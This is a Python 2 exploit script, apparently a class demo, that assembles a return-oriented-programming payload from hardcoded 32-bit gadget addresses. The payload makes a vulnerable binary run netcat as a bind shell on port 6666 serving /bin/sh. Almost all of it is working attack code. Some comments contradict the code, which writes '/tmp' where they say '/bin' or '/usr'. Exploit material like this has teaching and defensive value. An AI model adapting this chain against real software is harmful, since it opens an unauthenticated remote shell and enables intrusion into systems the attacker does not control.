security-cw/docs/exploit-nc.py


"""
This is a demo python script that creates a ROP chain to launch nc as:
> /bin//nc -lnp 6666 -tte /bin//sh
The gadgets in the following code are based on my machine & binary and as a result you will have to adjust the gadget based on your environment.
With the latest ROPGadget tool that we used in the class, we get the following ropchain:
- Step 1 -- Write-what-where gadgets
[+] Gadget found: 0x8056d05 mov dword ptr [edx], eax ; ret
[+] Gadget found: 0x806ee8b pop edx ; ret
[+] Gadget found: 0x80a8bf6 pop eax ; ret
[+] Gadget found: 0x80562c0 xor eax, eax ; ret
- Step 2 -- Init syscall number gadgets
[+] Gadget found: 0x80562c0 xor eax, eax ; ret
[+] Gadget found: 0x807c32a inc eax ; ret
- Step 3 -- Init syscall arguments gadgets
[+] Gadget found: 0x80481c9 pop ebx ; ret
[+] Gadget found: 0x806eeb2 pop ecx ; pop ebx ; ret
[+] Gadget found: 0x806ee8b pop edx ; ret
- Step 4 -- Syscall gadget
[+] Gadget found: 0x8049603 int 0x80
- Step 5 -- Build the ROP chain
"""
#!/usr/bin/env python
from struct import pack
import os
######################################
fileName=raw_input("Enter the file name")
outfile=open(fileName, "wb")
# this is just to create variables of the gadgets that we will be using
DATA = 0x080da120
EDAX0 = pack("<I", 0x08050a88)
STACK = pack("<I", DATA) # @ .data
INT80 = pack("<I", 0x08049603) # int 0x80
MOVISTACK = pack("<I", 0x08056d05) # mov dword ptr [edx], eax ; ret
INCEAX = pack("<I", 0x0807c32a) # inc eax ; ret
POPEDX = pack("<I", 0x0806ee8b) # pop edx ; ret
POPECXEBX = pack("<I", 0x0806eeb2) # pop ecx ; pop ebx ; ret
POPEAX = pack("<I", 0x080a8bf6) # pop eax ; ret
XOREAX = pack("<I", 0x080562c0) # xor eax, eax ; ret
DUMMY = pack("<I", 0x42424242) # padding
buff = "\x42" * 32
buff += "BBBB"*3
buff += POPEDX # it's via %ecx we will build our stack.
buff += STACK # %ecx contain the stack address.
buff += POPEAX # Lets put content in an address
buff += "/tmp" # put "/usr" in %eax
buff += MOVISTACK # put "/bin" in stack address
buff += POPEDX
buff += pack("<I", DATA + 4) # we change our stack for to point after "/bin"
buff += POPEAX # Applying the same for "/nc"
buff += "//nc"
buff += MOVISTACK # we place "//nc" after "/bin"
buff += POPEDX
buff += pack("<I", DATA + 9) # we change our stack for to point after "bin//nc"+1
# we repeated operation for each argument
buff += POPEAX
buff += "-lnp"
buff += MOVISTACK
buff += POPEDX
buff += pack("<I", DATA + 14)
buff += POPEAX
buff += "6666"
buff += MOVISTACK
buff += POPEDX
buff += pack("<I", DATA + 19)
buff += POPEAX
buff += "-tte"
buff += MOVISTACK
buff += POPEDX
buff += pack("<I", DATA + 24)
buff += POPEAX
buff += "/bin"
buff += MOVISTACK
buff += POPEDX
buff += pack("<I", DATA + 28)
buff += POPEAX
buff += "//sh"
buff += MOVISTACK
#
# We currently have our list of elements separated by \0
# Now we must construct our char ** i.e. array 'argguments' of strings
# arguments=[ @"/bin//nc", @"-lnp", @"6666", @"-tte", @"/bin//sh"]
#
buff += POPEDX
buff += pack("<I", DATA + 60) # shadow stack address (@ of arguments)
buff += POPEAX
buff += pack("<I", DATA) # @ of "/bin//nc" 0th item of arguments[]
buff += MOVISTACK # we place address of "/bin//nc" in our STACK
buff += POPEDX
buff += pack("<I", DATA + 64) # we shift our Stack Pointer + 4 for the second argument
buff += POPEAX
buff += pack("<I", DATA + 0x9) # @ of "-lnp"
buff += MOVISTACK # we place address of "-lnp" in our STACK
buff += POPEDX
buff += pack("<I", DATA + 68) # we shift our Stack Pointer + 4 for the 3rd argument
buff += POPEAX
buff += pack("<I", DATA + 0xe) # @ of "6666"
buff += MOVISTACK # we palce address of "6666" in our STACK
buff += POPEDX
buff += pack("<I", DATA + 72) # we shift our Stack Pointer + 4 for the 4th argument
buff += POPEAX
buff += pack("<I", DATA + 0x13) # @ of "-tte"
buff += MOVISTACK # we place address of "-tte" in our STACK
buff += POPEDX
buff += pack("<I", DATA + 76) # we shift our Stack Pointer + 4 for the 5th argument
buff += POPEAX
buff += pack("<I", DATA + 0x18) # @ of "/bin//sh"
buff += MOVISTACK # we place address of "/bin//sh" in our STACK
#
# Now we must implement eax to contain the address of
# the execve syscall.
# execve = 0xb
#
buff += XOREAX # %eax is put to zero.
buff += INCEAX * 11 # %eax is now 0xb
buff += POPEDX # last pop
buff += pack("<I", DATA + 48) # edx char *env
buff += POPECXEBX # last pop
buff += pack("<I", DATA + 60) # ecx char **arguments
buff += pack("<I", DATA) # ebx "/usr/bin//nc"
buff += INT80 # we execute
outfile.write(buff)
outfile.close()
#print buff